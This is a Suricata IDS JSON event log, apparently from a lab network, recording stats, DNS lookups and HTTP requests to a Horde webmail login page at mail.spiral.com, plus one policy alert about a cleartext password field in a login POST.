{"timestamp":"2020-02-29T00:19:31.000283+0000","event_type":"stats","stats":{"uptime":14823,"capture":{"kernel_packets":136721,"kernel_drops":0},"decoder":{"pkts":136725,"bytes":93889541,"invalid":192,"ipv4":135186,"ipv6":10,"ethernet":136725,"raw":0,"null":0,"sll":0,"tcp":129731,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2816,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2832,"synack":2823,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1853,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4729,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2456,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20505,"memcap_state":0,"memcap_global":0},"http":{"memuse":35546,"memcap":0}}} {"timestamp":"2020-02-29T00:19:35.000667+0000","flow_id":658082085123380,"event_type":"flow","src_ip":"192.168.10.122","src_port":33640,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:34.701748+0000","end":"2020-02-29T00:14:34.809817+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:35.000965+0000","flow_id":959704753418051,"event_type":"flow","src_ip":"192.168.10.122","src_port":39423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:34.700227+0000","end":"2020-02-29T00:14:34.808864+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:36.000618+0000","flow_id":209077614025364,"event_type":"flow","src_ip":"192.168.10.122","src_port":45522,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:34.924308+0000","end":"2020-02-29T00:14:35.033032+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:37.321340+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067}} {"timestamp":"2020-02-29T00:19:37.452485+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141}} {"timestamp":"2020-02-29T00:19:37.458114+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52900,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":5873,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.455097+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236}} {"timestamp":"2020-02-29T00:19:37.458500+0000","flow_id":1498976572011859,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52908,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005}} {"timestamp":"2020-02-29T00:19:37.456533+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52906,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236},"app_proto":"http","fileinfo":{"filename":"\/js\/horde.js","state":"CLOSED","stored":false,"size":6422,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.458990+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280}} {"timestamp":"2020-02-29T00:19:37.458934+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246}} {"timestamp":"2020-02-29T00:19:37.460469+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/mozilla.css","state":"CLOSED","stored":false,"size":173,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.460688+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118}} {"timestamp":"2020-02-29T00:19:37.460939+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52906,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/login.js","state":"CLOSED","stored":false,"size":415,"tx_id":1}} {"timestamp":"2020-02-29T00:19:37.461204+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258}} {"timestamp":"2020-02-29T00:19:37.479806+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52904,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":29020},"app_proto":"http","fileinfo":{"filename":"\/js\/prototype.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.480900+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":46054}} {"timestamp":"2020-02-29T00:19:37.561308+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:19:37.616998+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52904,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-default.png","state":"CLOSED","stored":false,"size":87,"tx_id":1}} {"timestamp":"2020-02-29T00:19:37.617541+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918}} {"timestamp":"2020-02-29T00:19:38.000205+0000","event_type":"stats","stats":{"uptime":14830,"capture":{"kernel_packets":136721,"kernel_drops":0},"decoder":{"pkts":136725,"bytes":93889541,"invalid":192,"ipv4":135186,"ipv6":10,"ethernet":136725,"raw":0,"null":0,"sll":0,"tcp":129731,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2816,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2832,"synack":2823,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1853,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4729,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2456,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19513,"memcap_state":0,"memcap_global":0},"http":{"memuse":259892,"memcap":0}}} {"timestamp":"2020-02-29T00:19:41.000397+0000","flow_id":479196697555204,"event_type":"flow","src_ip":"192.168.10.122","src_port":45154,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:39.946436+0000","end":"2020-02-29T00:14:40.054421+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:42.466236+0000","flow_id":1498976572011859,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52908,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005},"app_proto":"http","fileinfo":{"filename":"\/js\/accesskeys.js","state":"CLOSED","stored":false,"size":2729,"tx_id":0}} {"timestamp":"2020-02-29T00:19:42.474814+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118},"app_proto":"http","fileinfo":{"filename":"\/js\/login.js","state":"CLOSED","stored":false,"size":3062,"tx_id":1}} {"timestamp":"2020-02-29T00:19:42.474870+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52900,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":48239,"tx_id":1}} {"timestamp":"2020-02-29T00:19:42.474831+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52906,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/horde-power1.png","state":"CLOSED","stored":false,"size":2258,"tx_id":2}} {"timestamp":"2020-02-29T00:19:42.622221+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52904,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":918,"tx_id":2}} {"timestamp":"2020-02-29T00:19:45.000188+0000","event_type":"stats","stats":{"uptime":14837,"capture":{"kernel_packets":136862,"kernel_drops":0},"decoder":{"pkts":136870,"bytes":93972713,"invalid":192,"ipv4":135331,"ipv6":10,"ethernet":136870,"raw":0,"null":0,"sll":0,"tcp":129876,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2821,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2837,"synack":2828,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1858,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4740,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2460,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19182,"memcap_state":0,"memcap_global":0},"http":{"memuse":35946,"memcap":0}}} {"timestamp":"2020-02-29T00:19:45.001812+0000","flow_id":1926025151001775,"event_type":"flow","src_ip":"192.168.10.122","src_port":47129,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:44.210095+0000","end":"2020-02-29T00:14:44.318670+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:46.460465+0000","flow_id":206771237029553,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48104,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:46.569640+0000","flow_id":206771237029553,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":48104,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:46.569640+0000","flow_id":206771237029553,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":48104,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:46.684313+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51086,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48171,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:46.795379+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48171,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:46.795379+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48171,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:46.801513+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51086,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48172,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:19:46.811702+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7421}} {"timestamp":"2020-02-29T00:19:46.910017+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48172,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:46.910017+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48172,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:46.915013+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012887,"rev":3,"signature":"ET POLICY Http Client Body contains pass= in cleartext","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:19:46.915013+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:19:46.915013+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":113,"tx_id":0}} {"timestamp":"2020-02-29T00:19:46.942085+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39714,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:47.000564+0000","flow_id":345417056692646,"event_type":"flow","src_ip":"192.168.10.122","src_port":41179,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:46.043430+0000","end":"2020-02-29T00:14:46.152344+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:47.053741+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39714,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 